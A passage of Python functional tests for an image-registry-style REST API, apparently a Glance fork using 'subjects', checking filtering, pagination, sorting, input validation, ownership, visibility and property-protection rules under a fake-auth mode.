'X-Subject-Meta-Size': '20',
'X-Subject-Meta-Is-Public': 'True',
'X-Subject-Meta-Protected': 'False',
'X-Subject-Meta-Property-pants': 'are on'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
self.assertEqual("are on", data['subject']['properties']['pants'])
self.assertTrue(data['subject']['is_public'])
subject_ids.append(data['subject']['id'])
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'My Subject!',
'X-Subject-Meta-Status': 'saving',
'X-Subject-Meta-Container-Format': 'ami',
'X-Subject-Meta-Disk-Format': 'ami',
'X-Subject-Meta-Size': '21',
'X-Subject-Meta-Is-Public': 'True',
'X-Subject-Meta-Protected': 'False',
'X-Subject-Meta-Property-pants': 'are off'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
self.assertEqual("are off", data['subject']['properties']['pants'])
self.assertTrue(data['subject']['is_public'])
subject_ids.append(data['subject']['id'])
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'My Private Subject',
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Container-Format': 'ami',
'X-Subject-Meta-Disk-Format': 'ami',
'X-Subject-Meta-Size': '22',
'X-Subject-Meta-Is-Public': 'False',
'X-Subject-Meta-Protected': 'False'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
self.assertFalse(data['subject']['is_public'])
subject_ids.append(data['subject']['id'])
# 2. GET /subjects
# Verify three public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
# 3. GET /subjects with name filter
# Verify correct subjects returned with name
params = "name=My%20Subject!"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(2, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("My Subject!", subject['name'])
# 4. GET /subjects with status filter
# Verify correct subjects returned with status
params = "status=queued"
path = "/v1/subjects/detail?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("queued", subject['status'])
params = "status=active"
path = "/v1/subjects/detail?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(0, len(data['subjects']))
# 5. GET /subjects with container_format filter
# Verify correct subjects returned with container_format
params = "container_format=ovf"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(2, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("ovf", subject['container_format'])
# 6. GET /subjects with disk_format filter
# Verify correct subjects returned with disk_format
params = "disk_format=vdi"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(1, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("vdi", subject['disk_format'])
# 7. GET /subjects with size_max filter
# Verify correct subjects returned with size <= expected
params = "size_max=20"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(2, len(data['subjects']))
for subject in data['subjects']:
self.assertLessEqual(subject['size'], 20)
# 8. GET /subjects with size_min filter
# Verify correct subjects returned with size >= expected
params = "size_min=20"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(2, len(data['subjects']))
for subject in data['subjects']:
self.assertGreaterEqual(subject['size'], 20)
# 9. Get /subjects with is_public=None filter
# Verify correct subjects returned with property
# Bug lp:803656 Support is_public in filtering
params = "is_public=None"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(4, len(data['subjects']))
# 10. Get /subjects with is_public=False filter
# Verify correct subjects returned with property
# Bug lp:803656 Support is_public in filtering
params = "is_public=False"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(1, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("My Private Subject", subject['name'])
# 11. Get /subjects with is_public=True filter
# Verify correct subjects returned with property
# Bug lp:803656 Support is_public in filtering
params = "is_public=True"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
for subject in data['subjects']:
self.assertNotEqual(subject['name'], "My Private Subject")
# 12. Get /subjects with protected=False filter
# Verify correct subjects returned with property
params = "protected=False"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(2, len(data['subjects']))
for subject in data['subjects']:
self.assertNotEqual(subject['name'], "Subject1")
# 13. Get /subjects with protected=True filter
# Verify correct subjects returned with property
params = "protected=True"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(1, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("Subject1", subject['name'])
# 14. GET /subjects with property filter
# Verify correct subjects returned with property
params = "property-pants=are%20on"
path = "/v1/subjects/detail?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(2, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("are on", subject['properties']['pants'])
# 15. GET /subjects with property filter and name filter
# Verify correct subjects returned with property and name
# Make sure you quote the url when using more than one param!
params = "name=My%20Subject!&property-pants=are%20on"
path = "/v1/subjects/detail?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(1, len(data['subjects']))
for subject in data['subjects']:
self.assertEqual("are on", subject['properties']['pants'])
self.assertEqual("My Subject!", subject['name'])
# 16. GET /subjects with past changes-since filter
yesterday = timeutils.isotime(timeutils.utcnow() -
datetime.timedelta(1))
params = "changes-since=%s" % yesterday
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
# one timezone west of Greenwich equates to an hour ago
# taking care to pre-urlencode '+' as '%2B', otherwise the timezone
# '+' is wrongly decoded as a space
# TODO(eglynn): investigate '+' --> <SPACE> decoding, an artifact
# of WSGI/webob dispatch?
now = timeutils.utcnow()
hour_ago = now.strftime('%Y-%m-%dT%H:%M:%S%%2B01:00')
params = "changes-since=%s" % hour_ago
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
# 17. GET /subjects with future changes-since filter
tomorrow = timeutils.isotime(timeutils.utcnow() +
datetime.timedelta(1))
params = "changes-since=%s" % tomorrow
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(0, len(data['subjects']))
# one timezone east of Greenwich equates to an hour from now
now = timeutils.utcnow()
hour_hence = now.strftime('%Y-%m-%dT%H:%M:%S-01:00')
params = "changes-since=%s" % hour_hence
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(0, len(data['subjects']))
# 18. GET /subjects with size_min filter
# Verify correct subjects returned with size >= expected
params = "size_min=-1"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(400, response.status)
self.assertIn("filter size_min got -1", content)
# 19. GET /subjects with size_min filter
# Verify correct subjects returned with size >= expected
params = "size_max=-1"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(400, response.status)
self.assertIn("filter size_max got -1", content)
# 20. GET /subjects with size_min filter
# Verify correct subjects returned with size >= expected
params = "min_ram=-1"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(400, response.status)
self.assertIn("Bad value passed to filter min_ram got -1", content)
# 21. GET /subjects with size_min filter
# Verify correct subjects returned with size >= expected
params = "protected=imalittleteapot"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(400, response.status)
self.assertIn("protected got imalittleteapot", content)
# 22. GET /subjects with size_min filter
# Verify correct subjects returned with size >= expected
params = "is_public=imalittleteapot"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(400, response.status)
self.assertIn("is_public got imalittleteapot", content)
def test_limited_subjects(self):
"""
Ensure marker and limit query params work
"""
# 0. GET /subjects
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
subject_ids = []
# 1. POST /subjects with three public subjects with various attributes
headers = minimal_headers('Subject1')
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject_ids.append(jsonutils.loads(content)['subject']['id'])
headers = minimal_headers('Subject2')
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject_ids.append(jsonutils.loads(content)['subject']['id'])
headers = minimal_headers('Subject3')
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject_ids.append(jsonutils.loads(content)['subject']['id'])
# 2. GET /subjects with all subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
subjects = jsonutils.loads(content)['subjects']
self.assertEqual(3, len(subjects))
# 3. GET /subjects with limit of 2
# Verify only two subjects were returned
params = "limit=2"
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)['subjects']
self.assertEqual(2, len(data))
self.assertEqual(subjects[0]['id'], data[0]['id'])
self.assertEqual(subjects[1]['id'], data[1]['id'])
# 4. GET /subjects with marker
# Verify only two subjects were returned
params = "marker=%s" % subjects[0]['id']
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)['subjects']
self.assertEqual(2, len(data))
self.assertEqual(subjects[1]['id'], data[0]['id'])
self.assertEqual(subjects[2]['id'], data[1]['id'])
# 5. GET /subjects with marker and limit
# Verify only one subject was returned with the correct id
params = "limit=1&marker=%s" % subjects[1]['id']
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)['subjects']
self.assertEqual(1, len(data))
self.assertEqual(subjects[2]['id'], data[0]['id'])
# 6. GET /subjects/detail with marker and limit
# Verify only one subject was returned with the correct id
params = "limit=1&marker=%s" % subjects[1]['id']
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)['subjects']
self.assertEqual(1, len(data))
self.assertEqual(subjects[2]['id'], data[0]['id'])
# DELETE subjects
for subject_id in subject_ids:
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'DELETE')
self.assertEqual(200, response.status)
def test_ordered_subjects(self):
"""
Set up three test subjects and ensure each query param filter works
"""
# 0. GET /subjects
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
# 1. POST /subjects with three public subjects with various attributes
subject_ids = []
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'Subject1',
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Container-Format': 'ovf',
'X-Subject-Meta-Disk-Format': 'vdi',
'X-Subject-Meta-Size': '19',
'X-Subject-Meta-Is-Public': 'True'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject_ids.append(jsonutils.loads(content)['subject']['id'])
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'ASDF',
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Container-Format': 'bare',
'X-Subject-Meta-Disk-Format': 'iso',
'X-Subject-Meta-Size': '2',
'X-Subject-Meta-Is-Public': 'True'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject_ids.append(jsonutils.loads(content)['subject']['id'])
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'XYZ',
'X-Subject-Meta-Status': 'saving',
'X-Subject-Meta-Container-Format': 'ami',
'X-Subject-Meta-Disk-Format': 'ami',
'X-Subject-Meta-Size': '5',
'X-Subject-Meta-Is-Public': 'True'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject_ids.append(jsonutils.loads(content)['subject']['id'])
# 2. GET /subjects with no query params
# Verify three public subjects sorted by created_at desc
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
self.assertEqual(subject_ids[2], data['subjects'][0]['id'])
self.assertEqual(subject_ids[1], data['subjects'][1]['id'])
self.assertEqual(subject_ids[0], data['subjects'][2]['id'])
# 3. GET /subjects sorted by name asc
params = 'sort_key=name&sort_dir=asc'
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
self.assertEqual(subject_ids[1], data['subjects'][0]['id'])
self.assertEqual(subject_ids[0], data['subjects'][1]['id'])
self.assertEqual(subject_ids[2], data['subjects'][2]['id'])
# 4. GET /subjects sorted by size desc
params = 'sort_key=size&sort_dir=desc'
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(3, len(data['subjects']))
self.assertEqual(subject_ids[0], data['subjects'][0]['id'])
self.assertEqual(subject_ids[2], data['subjects'][1]['id'])
self.assertEqual(subject_ids[1], data['subjects'][2]['id'])
# 5. GET /subjects sorted by size desc with a marker
params = 'sort_key=size&sort_dir=desc&marker=%s' % subject_ids[0]
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(2, len(data['subjects']))
self.assertEqual(subject_ids[2], data['subjects'][0]['id'])
self.assertEqual(subject_ids[1], data['subjects'][1]['id'])
# 6. GET /subjects sorted by name asc with a marker
params = 'sort_key=name&sort_dir=asc&marker=%s' % subject_ids[2]
path = "/v1/subjects?%s" % (params)
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
data = jsonutils.loads(content)
self.assertEqual(0, len(data['subjects']))
# DELETE subjects
for subject_id in subject_ids:
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'DELETE')
self.assertEqual(200, response.status)
def test_duplicate_subject_upload(self):
"""
Upload initial subject, then attempt to upload duplicate subject
"""
# 0. GET /subjects
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
# 1. POST /subjects with public subject named Subject1
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'Subject1',
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Container-Format': 'ovf',
'X-Subject-Meta-Disk-Format': 'vdi',
'X-Subject-Meta-Size': '19',
'X-Subject-Meta-Is-Public': 'True'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
subject = jsonutils.loads(content)['subject']
# 2. POST /subjects with public subject named Subject1, and ID: 1
headers = {'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': 'Subject1 Update',
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Container-Format': 'ovf',
'X-Subject-Meta-Disk-Format': 'vdi',
'X-Subject-Meta-Size': '19',
'X-Subject-Meta-Id': subject['id'],
'X-Subject-Meta-Is-Public': 'True'}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(409, response.status)
def test_delete_not_existing(self):
"""
We test the following:
0. GET /subjects/1
- Verify 404
1. DELETE /subjects/1
- Verify 404
"""
# 0. GET /subjects
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
self.assertEqual('{"subjects": []}', content)
# 1. DELETE /subjects/1
# Verify 404 returned
path = "/v1/subjects/1"
response, content = self.http.request(path, 'DELETE')
self.assertEqual(404, response.status)
def _do_test_post_subject_content_bad_format(self, format):
"""
We test that missing container/disk format fails with 400 "Bad Request"
:see https://bugs.launchpad.net/subject/+bug/933702
"""
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
subjects = jsonutils.loads(content)['subjects']
self.assertEqual(0, len(subjects))
path = "/v1/subjects"
# POST /subjects without given format being specified
headers = minimal_headers('Subject1')
headers['X-Subject-Meta-' + format] = 'bad_value'
with tempfile.NamedTemporaryFile() as test_data_file:
test_data_file.write("XXX")
test_data_file.flush()
response, content = self.http.request(path, 'POST',
headers=headers,
body=test_data_file.name)
self.assertEqual(400, response.status)
type = format.replace('_format', '')
expected = "Invalid %s format 'bad_value' for subject" % type
self.assertIn(expected, content,
"Could not find '%s' in '%s'" % (expected, content))
# make sure the subject was not created
# Verify no public subjects
path = "/v1/subjects"
response, content = self.http.request(path, 'GET')
self.assertEqual(200, response.status)
subjects = jsonutils.loads(content)['subjects']
self.assertEqual(0, len(subjects))
def test_post_subject_content_bad_container_format(self):
self._do_test_post_subject_content_bad_format('container_format')
def test_post_subject_content_bad_disk_format(self):
self._do_test_post_subject_content_bad_format('disk_format')
def _do_test_put_subject_content_missing_format(self, format):
"""
We test that missing container/disk format only fails with
400 "Bad Request" when the subject content is PUT (i.e. not
on the original POST of a queued subject).
:see https://bugs.launchpad.net/subject/+bug/937216
"""
# POST queued subject
path = "/v1/subjects"
headers = {
'X-Subject-Meta-Name': 'Subject1',
'X-Subject-Meta-Is-Public': 'True',
}
response, content = self.http.request(path, 'POST', headers=headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
self.addDetail('subject_data', testtools.content.json_content(data))
# PUT subject content subjects without given format being specified
path = "/v1/subjects/%s" % (subject_id)
headers = minimal_headers('Subject1')
del headers['X-Subject-Meta-' + format]
with tempfile.NamedTemporaryFile() as test_data_file:
test_data_file.write("XXX")
test_data_file.flush()
response, content = self.http.request(path, 'PUT',
headers=headers,
body=test_data_file.name)
self.assertEqual(400, response.status)
type = format.replace('_format', '').capitalize()
expected = "%s format is not specified" % type
self.assertIn(expected, content,
"Could not find '%s' in '%s'" % (expected, content))
def test_put_subject_content_bad_container_format(self):
self._do_test_put_subject_content_missing_format('container_format')
def test_put_subject_content_bad_disk_format(self):
self._do_test_put_subject_content_missing_format('disk_format')
def _do_test_mismatched_attribute(self, attribute, value):
"""
Test mismatched attribute.
"""
subject_data = "*" * FIVE_KB
headers = minimal_headers('Subject1')
headers[attribute] = value
path = "/v1/subjects"
response, content = self.http.request(path, 'POST', headers=headers,
body=subject_data)
self.assertEqual(400, response.status)
subjects_dir = os.path.join(self.test_dir, 'subjects')
subject_count = len([name for name in os.listdir(subjects_dir)
if os.path.isfile(os.path.join(subjects_dir, name))])
self.assertEqual(0, subject_count)
def test_mismatched_size(self):
"""
Test mismatched size.
"""
self._do_test_mismatched_attribute('x-subject-meta-size',
str(FIVE_KB + 1))
def test_mismatched_checksum(self):
"""
Test mismatched checksum.
"""
self._do_test_mismatched_attribute('x-subject-meta-checksum',
'foobar')
class TestApiWithFakeAuth(base.ApiTest):
def __init__(self, *args, **kwargs):
super(TestApiWithFakeAuth, self).__init__(*args, **kwargs)
self.api_flavor = 'fakeauth'
self.registry_flavor = 'fakeauth'
def test_ownership(self):
# Add an subject with admin privileges and ensure the owner
# can be set to something other than what was used to authenticate
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
create_headers = {
'X-Subject-Meta-Name': 'MySubject',
'X-Subject-Meta-disk_format': 'raw',
'X-Subject-Meta-container_format': 'ovf',
'X-Subject-Meta-Is-Public': 'True',
'X-Subject-Meta-Owner': 'tenant2',
}
create_headers.update(auth_headers)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=create_headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertEqual('tenant2', response['x-subject-meta-owner'])
# Now add an subject without admin privileges and ensure the owner
# cannot be set to something other than what was used to authenticate
auth_headers = {
'X-Auth-Token': 'user1:tenant1:role1',
}
create_headers.update(auth_headers)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=create_headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
# We have to be admin to see the owner
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
create_headers.update(auth_headers)
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertEqual('tenant1', response['x-subject-meta-owner'])
# Make sure the non-privileged user can't update their owner either
update_headers = {
'X-Subject-Meta-Name': 'MySubject2',
'X-Subject-Meta-Owner': 'tenant2',
'X-Auth-Token': 'user1:tenant1:role1',
}
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'PUT',
headers=update_headers)
self.assertEqual(200, response.status)
# We have to be admin to see the owner
auth_headers = {
'X-Auth-Token': 'user1:tenant1:admin',
}
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertEqual('tenant1', response['x-subject-meta-owner'])
# An admin user should be able to update the owner
auth_headers = {
'X-Auth-Token': 'user1:tenant3:admin',
}
update_headers = {
'X-Subject-Meta-Name': 'MySubject2',
'X-Subject-Meta-Owner': 'tenant2',
}
update_headers.update(auth_headers)
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'PUT',
headers=update_headers)
self.assertEqual(200, response.status)
path = "/v1/subjects/%s" % (subject_id)
response, content = self.http.request(path, 'HEAD',
headers=auth_headers)
self.assertEqual(200, response.status)
self.assertEqual('tenant2', response['x-subject-meta-owner'])
def test_subject_visibility_to_different_users(self):
owners = ['admin', 'tenant1', 'tenant2', 'none']
visibilities = {'public': 'True', 'private': 'False'}
subject_ids = {}
for owner in owners:
for visibility, is_public in visibilities.items():
name = '%s-%s' % (owner, visibility)
headers = {
'Content-Type': 'application/octet-stream',
'X-Subject-Meta-Name': name,
'X-Subject-Meta-Status': 'active',
'X-Subject-Meta-Is-Public': is_public,
'X-Subject-Meta-Owner': owner,
'X-Auth-Token': 'createuser:createtenant:admin',
}
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_ids[name] = data['subject']['id']
def list_subjects(tenant, role='', is_public=None):
auth_token = 'user:%s:%s' % (tenant, role)
headers = {'X-Auth-Token': auth_token}
path = "/v1/subjects/detail"
if is_public is not None:
path += '?is_public=%s' % is_public
response, content = self.http.request(path, 'GET', headers=headers)
self.assertEqual(200, response.status)
return jsonutils.loads(content)['subjects']
# 1. Known user sees public and their own subjects
subjects = list_subjects('tenant1')
self.assertEqual(5, len(subjects))
for subject in subjects:
self.assertTrue(subject['is_public'] or subject['owner'] == 'tenant1')
# 2. Unknown user sees only public subjects
subjects = list_subjects('none')
self.assertEqual(4, len(subjects))
for subject in subjects:
self.assertTrue(subject['is_public'])
# 3. Unknown admin sees only public subjects
subjects = list_subjects('none', role='admin')
self.assertEqual(4, len(subjects))
for subject in subjects:
self.assertTrue(subject['is_public'])
# 4. Unknown admin, is_public=none, shows all subjects
subjects = list_subjects('none', role='admin', is_public='none')
self.assertEqual(8, len(subjects))
# 5. Unknown admin, is_public=true, shows only public subjects
subjects = list_subjects('none', role='admin', is_public='true')
self.assertEqual(4, len(subjects))
for subject in subjects:
self.assertTrue(subject['is_public'])
# 6. Unknown admin, is_public=false, sees only private subjects
subjects = list_subjects('none', role='admin', is_public='false')
self.assertEqual(4, len(subjects))
for subject in subjects:
self.assertFalse(subject['is_public'])
# 7. Known admin sees public and their own subjects
subjects = list_subjects('admin', role='admin')
self.assertEqual(5, len(subjects))
for subject in subjects:
self.assertTrue(subject['is_public'] or subject['owner'] == 'admin')
# 8. Known admin, is_public=none, shows all subjects
subjects = list_subjects('admin', role='admin', is_public='none')
self.assertEqual(8, len(subjects))
# 9. Known admin, is_public=true, sees all public and their subjects
subjects = list_subjects('admin', role='admin', is_public='true')
self.assertEqual(5, len(subjects))
for subject in subjects:
self.assertTrue(subject['is_public'] or subject['owner'] == 'admin')
# 10. Known admin, is_public=false, sees all private subjects
subjects = list_subjects('admin', role='admin', is_public='false')
self.assertEqual(4, len(subjects))
for subject in subjects:
self.assertFalse(subject['is_public'])
def test_property_protections(self):
# Enable property protection
self.config(property_protection_file=self.property_file)
self.init()
CREATE_HEADERS = {
'X-Subject-Meta-Name': 'MySubject',
'X-Subject-Meta-disk_format': 'raw',
'X-Subject-Meta-container_format': 'ovf',
'X-Subject-Meta-Is-Public': 'True',
'X-Subject-Meta-Owner': 'tenant2',
}
# Create an subject for role member with extra properties
# Raises 403 since user is not allowed to create 'foo'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:member',
}
custom_props = {
'x-subject-meta-property-foo': 'bar'
}
auth_headers.update(custom_props)
auth_headers.update(CREATE_HEADERS)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=auth_headers)
self.assertEqual(403, response.status)
# Create an subject for role member without 'foo'
auth_headers = {
'X-Auth-Token': 'user1:tenant1:member',
}
custom_props = {
'x-subject-meta-property-x_owner_foo': 'o_s_bar',
}
auth_headers.update(custom_props)
auth_headers.update(CREATE_HEADERS)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=auth_headers)
self.assertEqual(201, response.status)
# Returned subject entity should have 'x_owner_foo'
data = jsonutils.loads(content)
self.assertEqual('o_s_bar',
data['subject']['properties']['x_owner_foo'])
# Create an subject for role spl_role with extra properties
auth_headers = {
'X-Auth-Token': 'user1:tenant1:spl_role',
}
custom_props = {
'X-Subject-Meta-Property-spl_create_prop': 'create_bar',
'X-Subject-Meta-Property-spl_read_prop': 'read_bar',
'X-Subject-Meta-Property-spl_update_prop': 'update_bar',
'X-Subject-Meta-Property-spl_delete_prop': 'delete_bar'
}
auth_headers.update(custom_props)
auth_headers.update(CREATE_HEADERS)
path = "/v1/subjects"
response, content = self.http.request(path, 'POST',
headers=auth_headers)
self.assertEqual(201, response.status)
data = jsonutils.loads(content)
subject_id = data['subject']['id']
# Attempt to update two properties, one protected(spl_read_prop), the
# other not(spl_update_prop). Request should be forbidden.
auth_headers = {
'X-Auth-Token': 'user1:tenant1:spl_role',
}
custom_props = {
'X-Subject-Meta-Property-spl_read_prop': 'r',
'X-Subject-Meta-Property-spl_update_prop': 'u',
'X-Glance-Registry-Purge-Props': 'False'
}
auth_headers.update(auth_headers)
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
# Attempt to create properties which are forbidden
auth_headers = {
'X-Auth-Token': 'user1:tenant1:spl_role',
}
custom_props = {
'X-Subject-Meta-Property-spl_new_prop': 'new',
'X-Glance-Registry-Purge-Props': 'True'
}
auth_headers.update(auth_headers)
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(403, response.status)
# Attempt to update, create and delete properties
auth_headers = {
'X-Auth-Token': 'user1:tenant1:spl_role',
}
custom_props = {
'X-Subject-Meta-Property-spl_create_prop': 'create_bar',
'X-Subject-Meta-Property-spl_read_prop': 'read_bar',
'X-Subject-Meta-Property-spl_update_prop': 'u',
'X-Glance-Registry-Purge-Props': 'True'
}
auth_headers.update(auth_headers)
auth_headers.update(custom_props)
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'PUT',
headers=auth_headers)
self.assertEqual(200, response.status)
# Returned subject entity should reflect the changes
subject = jsonutils.loads(content)
# 'spl_update_prop' has update permission for spl_role
# hence the value has changed
self.assertEqual('u', subject['subject']['properties']['spl_update_prop'])
# 'spl_delete_prop' has delete permission for spl_role
# hence the property has been deleted
self.assertNotIn('spl_delete_prop', subject['subject']['properties'])
# 'spl_create_prop' has create permission for spl_role
# hence the property has been created
self.assertEqual('create_bar',
subject['subject']['properties']['spl_create_prop'])
# Subject Deletion should work
auth_headers = {
'X-Auth-Token': 'user1:tenant1:spl_role',
}
path = "/v1/subjects/%s" % subject_id
response, content = self.http.request(path, 'DELETE',
headers=auth_headers)
self.assertEqual(200, response.status)
# This subject should be no longer be directly accessible
auth_headers = {
